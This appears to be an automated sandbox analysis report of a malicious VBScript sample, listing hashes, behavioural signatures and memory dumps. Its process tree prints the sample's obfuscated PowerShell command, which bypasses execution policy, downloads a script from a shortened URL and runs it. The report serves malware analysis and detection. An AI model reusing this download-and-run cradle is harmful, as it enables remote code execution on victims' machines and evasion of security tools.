Analysis
-
max time kernel
62s -
max time network
90s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
27-07-2021 16:25
Static task
static1
Behavioral task
behavioral1
Sample
LKGFCV.vbs.vbs
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
General
-
Target
LKGFCV.vbs.vbs
-
Size
730B
-
MD5
8a7246cc77596aa840c15b3ac9907c4e
-
SHA1
c34f30b5aa3777cf3b3d35cfd8af330f8af97981
-
SHA256
c7be7d6e94c31e0f376d1cb9be3e0f311d57ae1a318437dc7c28b2574a73be31
-
SHA512
790e62a08b098dcdda4dfc1cc218712f069426b639420aca7ae6dfbd239f765fe379b92847d12da8a8f68699068d1779e7415d1c76fa64a989ae9dfa8b7dbe94
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1996 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1996 powershell.exe 1996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1996 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1036 wrote to memory of 1996 1036 WScript.exe powershell.exe PID 1036 wrote to memory of 1996 1036 WScript.exe powershell.exe PID 1036 wrote to memory of 1996 1036 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LKGFCV.vbs.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3BMLFhm'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1036-60-0x000007FEFB701000-0x000007FEFB703000-memory.dmpFilesize
8KB
-
memory/1996-61-0x0000000000000000-mapping.dmp
-
memory/1996-63-0x0000000002500000-0x0000000002501000-memory.dmpFilesize
4KB
-
memory/1996-64-0x000000001AD20000-0x000000001AD21000-memory.dmpFilesize
4KB
-
memory/1996-65-0x0000000001DD0000-0x0000000001DD1000-memory.dmpFilesize
4KB
-
memory/1996-66-0x000000001ACA0000-0x000000001ACA2000-memory.dmpFilesize
8KB
-
memory/1996-67-0x000000001ACA4000-0x000000001ACA6000-memory.dmpFilesize
8KB
-
memory/1996-68-0x0000000001E80000-0x0000000001E81000-memory.dmpFilesize
4KB
-
memory/1996-69-0x000000001A960000-0x000000001A961000-memory.dmpFilesize
4KB
-
memory/1996-70-0x000000001A9F0000-0x000000001A9F1000-memory.dmpFilesize
4KB
-
memory/1996-71-0x0000000001D40000-0x0000000001D41000-memory.dmpFilesize
4KB
-
memory/1996-72-0x000000001ABC0000-0x000000001ABC1000-memory.dmpFilesize
4KB